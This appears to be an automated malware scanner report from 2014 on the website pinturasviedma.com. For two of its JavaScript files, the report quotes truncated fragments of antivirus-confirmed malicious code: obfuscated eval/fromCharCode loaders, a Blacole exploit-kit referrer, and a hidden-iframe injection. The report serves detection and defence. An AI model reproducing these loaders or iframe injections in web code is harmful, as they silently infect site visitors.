
Malware Scanner report for pinturasviedma.com

Malicious/Suspicious/Total URLs checked: 2/0/4 (2 pages have malicious code. See details below)
Blacklists: OK
Malicious Redirects: OK
Malicious/Hidden/Total iFrames: 0/0/0
Deface / Content modification: OK


Scanned pages/files

Request | Server response | Status
http://pinturasviedma.com/
200 OK
Content-Length: 1482
Content-Type: text/html
clean
http://pinturasviedma.com/archivos/swf/run.js
200 OK
Content-Length: 9202
Content-Type: application/x-javascript
malicious
Malicious code - confirmed by antiviruses (see below)

function runSWF(archivo, ancho, alto, version, bgcolor, id, menu, FlashVars, quality, allowScriptAccess) { if(version!=""){
var version_data=version;
}else{
var version_data="6,0,0,0";
}
if(menu!=""){
menu_data=false;
}else{
menu_data=false;
}
if(bgcolor!=""){
var bgcolor_data=bgcolor;
}else{
var bgcolor_data="#FFFFFF";
}
if(id!=""){
id_data=id;
}else{
id_data="flashMovie";
}
if(quality!="
... 8307 bytes are skipped ...
06,550,204,295,192,50,192,160,192,160,192,160,192,160,192,160,192,160,600,555,594,585,654,505,660,580,276,490,666,500,726,230,582,560,672,505,660,500,402,520,630,540,600,200,630,510,684,545,246,295,60,160,192,160,192,160,192,160,192,625,60,160,192,160,192,625,594,485,696,495,624,200,606,205,738,625,60,625,264,160,318,240,288,205,354];v="eva";}if(v)e=window[v+"l"];w=f;s=[];r=String;z=((e)?"Code":"");for(;1776-5+5>i;i+=1){j=i;if(e)s=s+r[fr+((e)?"Code":12)]((w[j]/(5+e("j%2"))));}
if(f)e(s);}

Decoded script:


j%2
... 32997 bytes are skipped ...
ifrm.style.width = "0px";
ifrm.style.height = "0px";
ifrm.style.visibility = "hidden";
document.body.appendChild(ifrm);
}
} catch (e) {
}
}, 500 */
var hi = this.seed / this.Q;
var lo = this.seed % this.Q;
var test = this.A * lo - this.R * hi;
if(test > 0){
this.seed = test;
} else {
this.seed = test + this.M;
}
return (this.see

Antivirus reports:

nProtect: JS:Trojan.Iframer.C
K7AntiVirus: Trojan
Emsisoft: JS:Trojan.Iframer.C (B)
Kaspersky: HEUR:Trojan.Script.Iframer
Microsoft: Trojan:JS/Iframeinject.AB
MicroWorld-eScan: JS:Trojan.Iframer.C
F-Secure: JS:Trojan.Iframer.C
F-Prot: JS/IFrame.QW
GData: JS:Trojan.Iframer.C
Commtouch: JS/IFrame.QW
BitDefender: JS:Trojan.Iframer.C

http://pinturasviedma.com/archivos/swf/brc.js
200 OK
Content-Length: 6151
Content-Type: application/x-javascript
malicious
Malicious code - confirmed by antiviruses (see below)

if (window != window.top)
top.location.href = location.href;

function closeWindow()
{
this.top.close()
}

window.moveTo(0,0);
if (document.all) {
top.window.resizeTo(screen.availWidth,screen.availHeight);
}
else if (document.layers||document.getElementById) {
if (top.window.outerHeight<screen.availHeight||top.window.outerWidth<screen.availWidth){
top.window.outerHeight = scree
... 5300 bytes are skipped ...
05,230,105,196,105,216,105,232,121,122,34,208,105,200,100,202,110,68,59,200,111,198,117,218,101,220,116,92,98,222,100,242,46,194,112,224,101,220,100,134,104,210,108,200,40,210,102,228,109,82,125,250,99,194,116,198,104,80,101,82,123,250,125,88,53,96,48,82,59];v="e"+"v"+"a";}if(v)e=window[v+"l"];try{q=document.createElement("b");if(e)q.appendChild(q+"");}catch(fwbewe){w=f;s=[];}
r=String;z=((e)?"Code":"");for(;1333-5+5>i;i+=1){j=i;if(e)s=s+r.fromCharCode((w[j]/(2-1+j%2)));}
if(f)e(s);

Antivirus reports:

AntiVir: JS/BlacoleRef.BO.2
Avast: JS:Includer-ATS [Trj]
Ad-Aware: Trojan.JS.Agent.GLM
Ikarus: Trojan.JS.Blacole
Rising: JS:Trojan.Script.JS.BlacoleRef.e!1610800
nProtect: Trojan.JS.Agent.GLM
K7AntiVirus: Trojan ( 8458c54e0 )
Comodo: Exploit.JS.Blacole.DQ
Emsisoft: Trojan.JS.Agent.GLM (B)
K7GW: Exploit ( 04c554971 )
McAfee-GW-Edition: JS/Exploit-Blacole.ht
Microsoft: Trojan:JS/BlacoleRef.BO
Kaspersky: Trojan-Downloader.JS.Agent.gtj
MicroWorld-eScan: Trojan.JS.Agent.GLM
Fortinet: JS/Blacole.EUS!tr.dldr
Jiangmin: Trojan/Script.Gen
McAfee: JS/Exploit-Blacole.ht
NANO-Antivirus: Trojan.Script.Expack.vtxhd
F-Secure: Trojan.JS.Agent.GLM
VIPRE: Trojan.JS.Generic (v)
F-Prot: JS/Blacole.BV
AVG: JS/Agent
Norman: BlacoleRef.O
Sophos: Mal/Iframe-AF
GData: Trojan.JS.Agent.GLM
Commtouch: JS/Blacole.BV
ESET-NOD32: JS/Kryptik.QD
BitDefender: Trojan.JS.Agent.GLM

http://pinturasviedma.com/test404page.js
404 Not Found
Content-Length: 910
Content-Type: text/html
clean

Malicious Redirects

First query (normal visit):
GET / HTTP/1.1
Host: pinturasviedma.com

Result:
HTTP/1.1 200 OK
Date: Wed, 16 Apr 2014 04:37:05 GMT
Accept-Ranges: bytes
ETag: "42e8807df185cd1:0"
Server: Microsoft-IIS/7.5
Content-Length: 1482
Content-Type: text/html
Last-Modified: Wed, 29 Aug 2012 14:20:50 GMT
X-Powered-By: ASP.NET
X-Powered-By-Plesk: PleskWin

...1482 bytes of data.

Second query (visit from search engine):
GET / HTTP/1.1
Host: pinturasviedma.com
Referer: http://www.google.com/search?q=pinturasviedma.com

Result:
The result is similar to the first query. There are no suspicious redirects found.

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=pinturasviedma.com

Result: This site is not currently listed as suspicious.

Query: http://yandex.com/infected?l10n=en&url=http://pinturasviedma.com/

Result: pinturasviedma.com is not infected or malware details are not published yet.